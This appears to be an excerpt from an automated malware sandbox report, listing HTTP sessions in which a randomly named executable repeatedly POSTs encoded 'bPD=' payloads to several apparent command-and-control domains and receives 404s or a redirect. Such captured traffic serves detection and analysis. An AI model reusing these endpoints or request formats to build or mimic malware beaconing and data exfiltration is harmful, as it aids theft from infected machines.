                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449757203.161.42.162805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:50.546781063 CEST699OUTPOST /ukrf/ HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.lontos.top
                                              Referer: http://www.lontos.top/ukrf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 49 39 46 4a 55 42 2b 4c 47 58 41 6b 52 6f 4a 6b 30 38 5a 75 78 57 72 72 50 74 34 53 79 7a 61 34 75 30 51 73 49 46 2b 58 6d 69 6b 41 32 6d 74 42 69 51 62 77 7a 43 63 47 48 47 73 6d 56 52 66 47 62 70 52 70 54 61 45 66 69 75 71 71 61 69 4e 71 6c 50 37 7a 4c 39 31 4c 70 4d 63 64 55 47 52 49 4c 54 37 68 70 74 54 34 4d 5a 58 69 61 36 30 57 41 4c 4d 2b 4b 58 6b 66 68 49 62 44 6c 69 43 75 50 36 65 6a 52 4f 4a 74 42 56 4e 59 58 50 2b 72 6f 6a 2f 65 45 34 31 49 44 43 6b 44 61 6e 6e 64 44 2b 4f 59 30 7a 72 58 6d 43 41 65 66 58 58 44 76 63 67 6c 49 61 36 73 6c 55 79 48 42 37 30 51 66 69 32 46 4e 66 63 4f 54 78 72 6c 45 30 31 74 55 39 49 35 79 6d 6f 3d
                                              Data Ascii: bPD=I9FJUB+LGXAkRoJk08ZuxWrrPt4Syza4u0QsIF+XmikA2mtBiQbwzCcGHGsmVRfGbpRpTaEfiuqqaiNqlP7zL91LpMcdUGRILT7hptT4MZXia60WALM+KXkfhIbDliCuP6ejROJtBVNYXP+roj/eE41IDCkDanndD+OY0zrXmCAefXXDvcglIa6slUyHB70Qfi2FNfcOTxrlE01tU9I5ymo=
                                              Jul 26, 2024 13:57:51.119266987 CEST533INHTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:51 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449758203.161.42.162805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:53.114577055 CEST10781OUTPOST /ukrf/ HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.lontos.top
                                              Referer: http://www.lontos.top/ukrf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 49 39 46 4a 55 42 2b 4c 47 58 41 6b 52 6f 4a 6b 30 38 5a 75 78 57 72 72 50 74 34 53 79 7a 61 34 75 30 51 73 49 46 2b 58 6d 69 73 41 32 56 56 42 6a 7a 44 77 68 79 63 47 50 6d 73 6e 56 52 66 68 62 70 4a 74 54 61 41 68 69 74 65 71 59 48 5a 71 6a 2b 37 7a 41 39 31 4c 30 63 63 6d 4a 32 51 63 4c 53 4c 66 70 74 44 34 4d 5a 58 69 61 38 51 57 44 5a 30 2b 46 33 6b 65 78 59 61 43 7a 53 43 47 50 36 58 55 52 4f 63 59 42 42 78 59 57 72 65 72 71 51 58 65 5a 49 31 77 43 43 6b 74 61 6e 71 48 44 2b 69 36 30 79 66 70 6d 41 63 65 66 32 75 6f 79 74 34 79 62 70 37 7a 32 47 57 58 46 71 55 68 5a 31 2b 44 49 36 59 32 42 44 6e 71 50 57 73 44 49 4e 73 4e 6a 68 6b 4c 5a 66 41 69 74 4b 33 54 33 35 58 41 6d 6f 77 58 46 46 63 72 4f 76 30 36 4f 7a 73 65 4c 6d 66 31 2b 78 41 6b 44 36 38 6d 61 79 6b 6e 51 52 6e 6f 49 34 34 57 73 48 2f 69 6f 2b 35 4f 50 33 68 35 66 62 56 7a 53 41 59 6a 76 32 67 44 71 4c 6e 68 44 56 4b 52 54 32 68 42 73 6c 55 77 59 78 4b 55 44 2b 49 48 63 79 50 51 78 45 71 6d 6f 78 67 45 68 6a 70 4e 63 45 [TRUNCATED]
                                              Data Ascii: bPD=I9FJUB+LGXAkRoJk08ZuxWrrPt4Syza4u0QsIF+XmisA2VVBjzDwhycGPmsnVRfhbpJtTaAhiteqYHZqj+7zA91L0ccmJ2QcLSLfptD4MZXia8QWDZ0+F3kexYaCzSCGP6XUROcYBBxYWrerqQXeZI1wCCktanqHD+i60yfpmAcef2uoyt4ybp7z2GWXFqUhZ1+DI6Y2BDnqPWsDINsNjhkLZfAitK3T35XAmowXFFcrOv06OzseLmf1+xAkD68mayknQRnoI44WsH/io+5OP3h5fbVzSAYjv2gDqLnhDVKRT2hBslUwYxKUD+IHcyPQxEqmoxgEhjpNcEy6LxMFyeb6G1R82tNndvckM5dGPfUrZA/CJFtlWtLAqPbOhL8YC4NJJheSQDkX0gclUXJazOz+gbFfphRSXaui/pZTwplOyezPAp88wFzA656A5Hi+nBhtARg7h7CvR8pIO+LKJEQh/Ak+68O+86Kup5Zj6q6lU5NxjEvM7pr5FOJkwL/M1QPbmQ/95E4i/TGmd952xcmXpZCqGSXF0DQpVTXxGv/b+1e2LXqQmsxuYmibZr7TWdb9bwhH+47l0mwjB80Qme8C2Z63B5OX53fBBlLFbXGlHFruFlGnr+sGqd03aj/nefaqxjcQETPahZ/yjvTI/CvR0iOCGtN7s4WFvY/HH0dCvx/1CiMiP5vUNnEetKpRVc0ELqnHJArtStks2siShETGeWkeXcdUz1q+cHiRj9eHH7LbW9DglzvGuwCmqsY+7+NPvP9GRs4l1NsidctXvtlarW7JDK7qe8glRZKVPRCujzENk5SPi43LegOPGgG57qv741EmFBVeh96nueZirCjQm4GwNJy4Yo3OCrdNWmNJPubZGaFLcCCAW7hYYLbOk9KjaTPlqXRYA3s5nmo9Z3gyLxCY74V5uEqcuCtcPnjo8v/4ixaHN4Sk3tHKHv8UIykLs5dQK12eUqRfRGjq9MHWTUZETXyxRXtCxlnIWWNd4VY3 [TRUNCATED]
                                              Jul 26, 2024 13:57:53.744334936 CEST533INHTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:53 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449759203.161.42.162805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:55.678356886 CEST427OUTGET /ukrf/?bPD=F/tpX3aJNzQcZIorwLh3+lvUFPUZ/CrYoWsqF027uxYn9zYWtTXD7TxpBDgZUhfyO+VwBO4Do9/nXXxf/u2OALcIo7otd0ARGQzWw/PbAY7nMJoOO6tnPWI=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:56.269808054 CEST548INHTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:56 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.4497603.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:01.520011902 CEST703OUTPOST /6fdz/ HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.theiconsummit.life
                                              Referer: http://www.theiconsummit.life/6fdz/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 44 67 32 56 47 68 4c 47 33 65 2b 68 75 74 48 63 35 55 4a 2b 5a 50 6e 63 64 65 34 70 64 6b 68 61 37 56 71 6b 79 62 68 6d 45 6e 4f 37 78 39 5a 4c 74 38 37 41 4b 68 79 67 33 63 65 30 74 57 4c 39 46 4e 45 41 2b 79 7a 6f 78 66 79 6f 38 4e 5a 44 53 6d 48 47 66 52 4f 65 65 38 6a 7a 68 43 54 41 50 6e 5a 68 4a 33 5a 33 4c 49 43 42 72 68 2b 4d 6d 31 33 64 4a 71 2b 30 67 72 35 2b 71 38 49 6e 77 77 70 4f 4b 69 6d 4c 78 42 79 49 4f 6f 4e 4e 57 6b 4c 70 4e 7a 78 6f 67 66 57 54 6c 4b 47 39 74 48 48 6d 6f 78 30 2f 6d 52 66 46 56 50 76 45 4b 6c 74 32 6d 53 49 6b 33 54 48 39 56 57 53 63 35 77 3d 3d
                                              Data Ascii: bPD=Dg2VGhLG3e+hutHc5UJ+ZPncde4pdkha7VqkybhmEnO7x9ZLt87AKhyg3ce0tWL9FNEA+yzoxfyo8NZDSmHGfROee8jzhCTAPnZhJ3Z3LICBrh+Mm13dJq+0gr5+q8InwwpOKimLxByIOoNNWkLpNzxogfWTlKG9tHHmox0/mRfFVPvEKlt2mSIk3TH9VWSc5w==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.4497613.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:04.096533060 CEST723OUTPOST /6fdz/ HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.theiconsummit.life
                                              Referer: http://www.theiconsummit.life/6fdz/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 44 67 32 56 47 68 4c 47 33 65 2b 68 2f 38 33 63 71 6a 31 2b 65 76 6e 62 52 2b 34 70 55 45 68 65 37 56 6d 6b 79 59 73 6a 45 31 71 37 79 59 6c 4c 2f 4e 37 41 4e 68 79 67 76 4d 65 78 67 32 4c 32 46 4e 42 2f 2b 32 33 6f 78 62 61 6f 38 4a 64 44 52 55 76 42 5a 42 4f 51 48 73 6a 39 6c 43 54 41 50 6e 5a 68 4a 33 4e 4a 4c 49 4b 42 72 78 4f 4d 6e 55 33 65 4b 71 2b 33 77 4c 35 2b 67 63 49 6a 77 77 6f 5a 4b 6a 36 68 78 44 4b 49 4f 74 78 4e 58 32 6a 75 57 6a 77 6a 76 2f 58 61 6d 61 48 46 73 79 36 39 6a 58 6f 4d 74 77 54 70 64 70 2b 65 62 55 4d 68 30 53 73 58 71 55 4f 4a 59 56 76 56 69 78 32 48 57 42 57 45 77 47 39 57 44 7a 2b 71 6d 36 35 53 58 66 73 3d
                                              Data Ascii: bPD=Dg2VGhLG3e+h/83cqj1+evnbR+4pUEhe7VmkyYsjE1q7yYlL/N7ANhygvMexg2L2FNB/+23oxbao8JdDRUvBZBOQHsj9lCTAPnZhJ3NJLIKBrxOMnU3eKq+3wL5+gcIjwwoZKj6hxDKIOtxNX2juWjwjv/XamaHFsy69jXoMtwTpdp+ebUMh0SsXqUOJYVvVix2HWBWEwG9WDz+qm65SXfs=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.4497623.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:06.666810036 CEST10805OUTPOST /6fdz/ HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.theiconsummit.life
                                              Referer: http://www.theiconsummit.life/6fdz/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 44 67 32 56 47 68 4c 47 33 65 2b 68 2f 38 33 63 71 6a 31 2b 65 76 6e 62 52 2b 34 70 55 45 68 65 37 56 6d 6b 79 59 73 6a 45 31 69 37 79 75 78 4c 74 65 54 41 4d 68 79 67 78 63 65 77 67 32 4c 33 46 4e 35 37 2b 32 36 56 78 5a 53 6f 75 38 4a 44 47 51 37 42 58 42 4f 51 61 38 6a 77 68 43 54 76 50 6e 4a 6c 4a 33 64 4a 4c 49 4b 42 72 7a 47 4d 67 46 33 65 47 4b 2b 30 67 72 35 4d 71 38 49 48 77 77 78 73 4b 67 57 62 77 77 43 49 4f 4e 42 4e 56 44 58 75 61 6a 77 68 37 66 58 43 6d 61 4c 61 73 79 4f 78 6a 58 31 45 74 77 58 70 59 65 7a 48 4d 57 41 6b 6a 53 4a 4e 36 6d 61 7a 57 6b 4c 53 6e 52 61 35 5a 54 32 6f 67 46 78 4e 45 43 6a 4e 68 49 5a 6e 4c 66 5a 64 6e 73 75 37 31 7a 53 51 6b 6f 44 54 44 7a 65 77 38 54 76 42 44 35 65 4e 4a 4e 7a 62 4a 76 44 61 69 6e 5a 51 50 6b 78 52 62 79 39 4e 6b 31 4f 45 75 2b 63 66 56 68 49 37 55 33 54 2f 77 48 32 4a 52 69 73 78 63 46 73 53 5a 6a 42 6b 42 59 2f 6f 64 64 6a 65 62 78 6a 44 78 7a 49 4d 45 30 34 49 70 5a 59 79 61 6a 49 38 35 6e 47 67 4a 56 6f 58 36 31 68 67 31 36 [TRUNCATED]
                                              Data Ascii: bPD=Dg2VGhLG3e+h/83cqj1+evnbR+4pUEhe7VmkyYsjE1i7yuxLteTAMhygxcewg2L3FN57+26VxZSou8JDGQ7BXBOQa8jwhCTvPnJlJ3dJLIKBrzGMgF3eGK+0gr5Mq8IHwwxsKgWbwwCIONBNVDXuajwh7fXCmaLasyOxjX1EtwXpYezHMWAkjSJN6mazWkLSnRa5ZT2ogFxNECjNhIZnLfZdnsu71zSQkoDTDzew8TvBD5eNJNzbJvDainZQPkxRby9Nk1OEu+cfVhI7U3T/wH2JRisxcFsSZjBkBY/oddjebxjDxzIME04IpZYyajI85nGgJVoX61hg16kmmLNhpu704yq7fAysc2BBxAuXXvbW6xR4WNy9VUoWl0SiMz04K0efaN98urlp9v074Ah/v21sWkzpU9WG/iA8rO/nRokVxdmqOUQe+e9pIr87KIQihtsvKZV5y/XHIoJXshS0Q1SiL1vp2yRJCMyeAXrpo1LJpmiw02CruX0LciZXNlEAemr8fFAtw4eE/tO+ReNz8vC55hwIbcBZX75qQJ7M7hWi9aQmH+M4Kj84RANGehM4eTkLqqVzweRu3E3Ims4dA8HogEwIErkVB2ClQoqv04RC8jqkFyFFyBWkKXgPWlD7JPkN+KKwNPjAXR6RXEe3PzgPe9/OzaNZ/rdIytQAXoYn/D6gGzLh3PJHj7yqiMQvfMsY4vJ1rwrW5ON4lLUzpUI0USduM/6iE4kkfzoedLbuMNqxbWcVyiVOQdCx5mUAhtTyVN5W4wK/mMmdcIjkmMFhIMaZ/dATOa9n/9DyOKub6+HdKAHDbj9q53xa70SgYQLXDJ74xpZdyU6fvsiamgBNUhe+lxhRUUP3Y0RQntRiBLjtz6AOUcyY7sYA64FRJl6qVZeFwo5vXa56jBfCG2MG9m0LFAj4Jd9WIQ/grlnIlXvnVu0h/gcZ5FmlJO1JnvlHH5zba4pggHnhHwL53sF9Uw8jO/fuMNuA6C78TQYx+dye [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.4497633.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:09.235198975 CEST435OUTGET /6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.theiconsummit.life
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:58:09.696382999 CEST399INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Fri, 26 Jul 2024 11:58:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 259
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 50 44 3d 4f 69 65 31 46 58 4b 45 79 4f 71 78 75 4e 57 57 79 7a 6b 59 64 50 66 5a 52 65 52 6b 63 47 30 5a 31 45 61 79 32 4b 74 56 64 45 43 33 34 49 34 64 7a 2f 2f 50 48 7a 7a 72 34 76 65 31 74 53 66 53 52 74 39 4d 2f 6e 50 57 75 36 62 44 72 4d 70 30 48 6d 37 48 65 51 57 72 47 5a 50 63 6d 43 4c 6d 50 6e 6c 35 47 6c 4a 72 4d 72 65 2b 6f 6a 7a 79 68 47 4f 59 41 35 41 3d 26 72 34 48 74 49 3d 69 6e 44 48 65 54 53 30 44 36 4a 48 69 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449764103.29.180.74805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:15.145391941 CEST712OUTPOST /5pdf/ HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.accessoriestechbd.com
                                              Referer: http://www.accessoriestechbd.com/5pdf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
